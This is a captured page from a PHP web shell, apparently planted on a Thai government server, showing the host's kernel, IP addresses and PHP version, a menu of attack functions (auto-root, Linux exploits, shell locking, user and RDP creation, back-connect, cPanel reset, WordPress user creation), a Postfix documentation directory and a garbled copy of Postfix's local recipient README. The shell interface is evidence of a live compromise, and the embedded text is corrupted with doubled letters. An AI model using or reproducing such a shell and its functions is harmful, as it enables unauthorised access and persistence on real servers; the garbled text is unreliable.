Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
postfix-2.6.6 /
README_FILES /
[ HOME SHELL ]
Name
Size
Permission
Action
AAAREADME
2.7
KB
-rw-r--r--
ADDRESS_CLASS_README
9.33
KB
-rw-r--r--
ADDRESS_REWRITING_README
42.68
KB
-rw-r--r--
ADDRESS_VERIFICATION_README
19.46
KB
-rw-r--r--
BACKSCATTER_README
12.3
KB
-rw-r--r--
BASIC_CONFIGURATION_README
20.73
KB
-rw-r--r--
BUILTIN_FILTER_README
13.94
KB
-rw-r--r--
CDB_README
2.69
KB
-rw-r--r--
CONNECTION_CACHE_README
8.96
KB
-rw-r--r--
CONTENT_INSPECTION_README
3.29
KB
-rw-r--r--
DATABASE_README
13.25
KB
-rw-r--r--
DB_README
6.9
KB
-rw-r--r--
DEBUG_README
17.71
KB
-rw-r--r--
DSN_README
4.33
KB
-rw-r--r--
ETRN_README
11.4
KB
-rw-r--r--
FILTER_README
27.04
KB
-rw-r--r--
INSTALL
32.72
KB
-rw-r--r--
IPV6_README
11.73
KB
-rw-r--r--
LDAP_README
19.83
KB
-rw-r--r--
LINUX_README
1.64
KB
-rw-r--r--
LOCAL_RECIPIENT_README
5.65
KB
-rw-r--r--
MAILDROP_README
5.16
KB
-rw-r--r--
MILTER_README
36.6
KB
-rw-r--r--
MULTI_INSTANCE_README
42.4
KB
-rw-r--r--
MYSQL_README
4.31
KB
-rw-r--r--
NFS_README
4.73
KB
-rw-r--r--
OVERVIEW
18.57
KB
-rw-r--r--
PACKAGE_README
5.45
KB
-rw-r--r--
PCRE_README
2.87
KB
-rw-r--r--
PGSQL_README
4.4
KB
-rw-r--r--
QSHAPE_README
36.13
KB
-rw-r--r--
RELEASE_NOTES
12.37
KB
-rw-r--r--
RESTRICTION_CLASS_README
6.71
KB
-rw-r--r--
SASL_README
23.29
KB
-rw-r--r--
SCHEDULER_README
65.06
KB
-rw-r--r--
SMTPD_ACCESS_README
15.41
KB
-rw-r--r--
SMTPD_POLICY_README
19.37
KB
-rw-r--r--
SMTPD_PROXY_README
10.47
KB
-rw-r--r--
STANDARD_CONFIGURATION_README
25.24
KB
-rw-r--r--
STRESS_README
19.62
KB
-rw-r--r--
TLS_LEGACY_README
51.46
KB
-rw-r--r--
TLS_README
96.1
KB
-rw-r--r--
TUNING_README
23.76
KB
-rw-r--r--
ULTRIX_README
1.96
KB
-rw-r--r--
UUCP_README
5.14
KB
-rw-r--r--
VERP_README
7
KB
-rw-r--r--
VIRTUAL_README
23.29
KB
-rw-r--r--
XCLIENT_README
9.39
KB
-rw-r--r--
XFORWARD_README
8.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : LOCAL_RECIPIENT_README
RReejjeeccttiinngg UUnnkknnoowwnn LLooccaall RReecciippiieennttss wwiitthh PPoossttffiixx ------------------------------------------------------------------------------- IInnttrroodduuccttiioonn As of Postfix version 2.0, the Postfix SMTP server rejects mail for unknown recipients in local domains (domains that match $mydestination or the IP addresses in $inet_interfaces or $proxy_interfaces) with "User unknown in local recipient table". This feature was optional with earlier Postfix versions. The good news is that this keeps undeliverable mail out of your queue, so that your mail queue is not clogged up with undeliverable MAILER-DAEMON messages. The bad news is that it may cause mail to be rejected when you upgrade from a Postfix system that was not configured to reject mail for unknown local recipients. This document describes what steps are needed in order to reject unknown local recipients correctly. * Configuring local_recipient_maps in main.cf * When you need to change the local_recipient_maps setting in main.cf * Local recipient table format CCoonnffiigguurriinngg llooccaall__rreecciippiieenntt__mmaappss iinn mmaaiinn..ccff The local_recipient_maps parameter specifies lookup tables with all names or addresses of local recipients. A recipient address is local when its domain matches $mydestination, $inet_interfaces or $proxy_interfaces. If a local username or address is not listed in $local_recipient_maps, then the Postfix SMTP server will reject the address with "User unknown in local recipient table". The default setting, shown below, assumes that you use the default Postfix local(8) delivery agent for local delivery, where recipients are either UNIX accounts or local aliases: /etc/postfix/main.cf: local_recipient_maps = proxy:unix:passwd.byname $alias_maps To turn off unknown local recipient rejects by the SMTP server, specify: /etc/postfix/main.cf: local_recipient_maps = That is, an empty value. With this setting, the Postfix SMTP server will not reject mail with "User unknown in local recipient table". DDoonn''tt ddoo tthhiiss oonn ssyysstteemmss tthhaatt rreecceeiivvee mmaaiill ddiirreeccttllyy ffrroomm tthhee IInntteerrnneett.. WWiitthh ttooddaayy''ss wwoorrmmss aanndd vviirruusseess,, PPoossttffiixx wwiillll bbeeccoommee aa bbaacckkssccaatttteerr ssoouurrccee:: iitt aacccceeppttss mmaaiill ffoorr nnoonn-- eexxiisstteenntt rreecciippiieennttss aanndd tthheenn ttrriieess ttoo rreettuurrnn tthhaatt mmaaiill aass ""uunnddeelliivveerraabbllee"" ttoo tthhee oofftteenn ffoorrggeedd sseennddeerr aaddddrreessss. WWhheenn yyoouu nneeeedd ttoo cchhaannggee tthhee llooccaall__rreecciippiieenntt__mmaappss sseettttiinngg iinn mmaaiinn..ccff * Problem: you don't use the default Postfix local(8) delivery agent for domains matching $mydestination, $inet_interfaces, or $proxy_interfaces. For example, you redefined the "local_transport" setting in main.cf. Solution: your local_recipient_maps setting needs to specify a database that lists all the known user names or addresses for that delivery agent. For example, if you deliver users in $mydestination etc. domains via the virtual(8) delivery agent, specify: /etc/postfix/main.cf mydestination = $myhostname localhost.$mydomain localhost ... local_transport = virtual local_recipient_maps = $virtual_mailbox_maps If you use a different delivery agent for $mydestination etc. domains, see the section "Local recipient table format" below for a description of how the table should be populated. * Problem: you use the mailbox_transport or fallback_transport feature of the Postfix local(8) delivery agent in order to deliver mail to non-UNIX accounts. Solution: you need to add the database that lists the non-UNIX users: /etc/postfix/main.cf local_recipient_maps = proxy:unix:passwd.byname, $alias_maps, <the database with non-UNIX accounts> See the section "Local recipient table format" below for a description of how the table should be populated. * Problem: you use the luser_relay feature of the Postfix local delivery agent. Solution: you must disable the local_recipient_maps feature completely, so that Postfix accepts mail for all local addresses: /etc/postfix/main.cf local_recipient_maps = LLooccaall rreecciippiieenntt ttaabbllee ffoorrmmaatt If you use local files in postmap(1) format, then local_recipient_maps expects the following table format: * In the left-hand side, specify a bare username, an "@domain.tld" wild-card, or specify a complete "user@domain.tld" address. * You have to specify something on the right-hand side of the table, but the value is ignored by local_recipient_maps. If you use lookup tables based on NIS, LDAP, MYSQL, or PGSQL, then local_recipient_maps does the same queries as for local files in postmap(1) format, and expects the same results. With regular expression tables, Postfix only queries with the full recipient address, and not with the bare username or the "@domain.tld" wild-card. NOTE: a lookup table should always return a result when the address exists, and should always return "not found" when the address does not exist. In particular, a zero-length result does not count as a "not found" result.
Close